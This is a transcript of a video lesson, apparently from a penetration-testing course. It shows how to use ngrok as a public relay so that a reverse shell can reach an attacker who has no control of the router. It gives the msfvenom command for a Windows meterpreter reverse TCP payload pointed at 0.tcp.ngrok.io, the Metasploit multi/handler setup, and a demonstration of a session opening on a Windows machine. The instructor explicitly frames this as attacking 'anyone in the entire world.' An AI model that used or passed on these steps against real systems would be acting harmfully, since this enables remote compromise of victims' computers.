Hello everybody and welcome back. And right now, before we continue, I just want to show you an alternative to the port forwarding attack, well, basically the attack over the internet. Now, let's say for example you are on a cafe Wi-Fi and you do not have the access to the router, and you for example want to port forward or actually be able to attack anyone in the entire world over a link or over something like that. You can't really perform the port forwarding since you do not have access to the router, so you need to have the alternative for that. Now, the alternative is a program called Ngrok. Now, Ngrok, I don't think it comes pre-installed in Kali Linux. We will not be installing it since that is only an optional. I already have it installed on my laptop. If you want to, you can just go onto your Firefox and just search installing ngrok basically commands or something like that, and I believe it is rather easy to install. You would probably need to make an account on their website in order for this to work, but I believe you will do that very easily since I don't remember having any problem during the installation of this program. So you just go ngrok download, and then you can actually find it somewhere, either it being on the GitHub, as we can see right here, and you can go onto their official website and actually download it from there. Now, this is also something you can run both on Linux and both on Windows, so that's good to know as well. So once you download that, you will have probably an account, and once you do that, just type here ngrok --help. I believe it has help options, okay, so it does have --help. And basically what you want to do is actually perform a port forwarding with this tool on their website. So what they allow you is to have an open port on their website. When someone connects to their website over some open port, that will forward the connection straight to you. So their website actually acts as a router in that case, as a port forwarder for our own machine. As we can see some of the examples right here, ngrok HTTP 80 secure public URL for port 80 web server. So if you were to example run this, you would be able to give access to your Apache 2 web server to anyone in the world, for anyone that actually types the link with your open port. Now, you might be asking, well, isn't that the same as hosting, and how does this come for free? Well, the free version actually changes your port every time you restart the ngrok, so you will not be able to have a static address for this, but you can pay in the, I believe, professional version or something like that, where they actually allow you to have the same port every time you run ngrok. But right now, what we want to do is actually type ngrok TCP, and then we want to use the port that we want to forward in our Kali Linux machine, or basically in my laptop in this case. So let's just say port 5555, and then when we run this, you will see that it will actually try to connect to the to their web server, and soon enough I believe it will give us an open port on their website. So reconnecting, it will give you some of these timeout sessions, but don't worry, I believe in a few seconds that this will perform a full connection to their website. So let's wait for that to happen. And here we are, we can see that we are currently online. So the few things that we have right here is the session status, which is the status of our currently web server, or not web server, our open port. The account that I made when I was making the ngrok was this one. As we can see, it is plan free, which means I do not have the premium version. Update available, doesn't matter the version, the region, United States. The forwarding is done on this link right here. So this is the link, and this is your port that they used in order to forward your connection. So it is forwarding it to our local host at port 5555. So with this, you do not need to actually port forward anything in the router. You can just bring your laptop anywhere and perform the attack over the entire internet. But right now, there are a few things also that you need to change while running this. So let's open another terminal right here, and let me change my directory to the desktop directory. Now, let's say we want to make a payload and we want to make that payload connect back to us. So what we want to do is msf venom minus p, and let's create a simple Windows meterpreter reverse TCP. And now in the L host, you would want to specify this. So you would want to specify this link right here. So 0.tcp.ngrok.io. Now that, I believe, link, it will be the same for everyone. So you just specify that link. And what that will do is when the target that you send this file to runs this, it will connect to their website on this port. So you need to set the local host to be 0.tcp.ngrok.io and local port to be the port that they gave us. So 14583 in my case. So 14583. Now let me just enlarge this a little bit. So zoom in. And after this, what you want to specify is the same as before. So you can use encoder if you want to, but I will not use in this case. So file exe, and we put that into shell.exe. This will create a simple Windows meterpreter reverse shell for us that will perform a connection to their website on this port. Now what that website will do then, it will forward that connection to our local host, which is 0.0.0.0 on port 5555. Now it means that actually it will forward it to the all interfaces, I believe, so you will be able to receive connection. There are also some of the things that you need to change in the MSF console as well. So I will show you that as well right now. Let me just, first of all, what I want to do is first of all become the root and then copy this shell.exe in var www.html so I can download it on my Windows 10 machine. So let's do that as well. Now while I do that, I will run here MSF console. So we let this open and then I will show you what you need to specify in order for this to actually work. So the simple thing you need to do is basically same as before. So you need to type here use exploit multi handler. Once you do that, you basically just need to set the payload as the payload that you use. So in my case, it is Windows meterpreter reverse TCP. Now here, as we show options right here, you want to set the L host to be 0.0.0.0 and you want the L port to be 5555, since that is the L port that we specified in the ngrok command. So set L port to be 5555. After you do all of that, you should be good to go. So I will just run my shell.exe over my Windows 10 machine. Let me just find it where I saved it. While I do that, I will just run this exploit JZ so it runs in the background. Right now, I will run my shell.exe. It will ask me, do I want to run it, since I actually installed it, downloaded it from the Apache 2. Whoops, let me just scroll this back down. I want to click more info, run anyway. And we can see that I got the meterpreter session opened. So we were actually able to connect, or basically to hack a remote remote target that is actually across the globe. Now my Windows 10 machine isn't really across the globe, but this will work wherever that machine was, since we actually made that machine connect back to this link right here, which is a publicly available link. If I go right here on my Firefox, as we can see right here, sessions I1, if I get UID, you will see that this is my Windows 10 machine. So we can close this since we don't need to do anything anymore. And let me close this terminal as well. And if we use this link right here and copy it, you will see that there actually is a connection to that link. If I were to, for example, set up a listener and paste this right here, the listener would be able to, it would actually perform a meterpreter shell opening but the shell won't really work since there is no payload on this website. Now it says the connection was reset because we are not really listening for any connections at the moment, so we can't actually load the page. So that would be about it for this Ngrok tutorial. It is an alternative to port forwarding if you are, for example, not doing the over internet attacks over your own network with your own router. So you can use this in order to perform a simple port forward with the Ngrok website. So hope you enjoyed this video and hope I see you in the next one. Bye.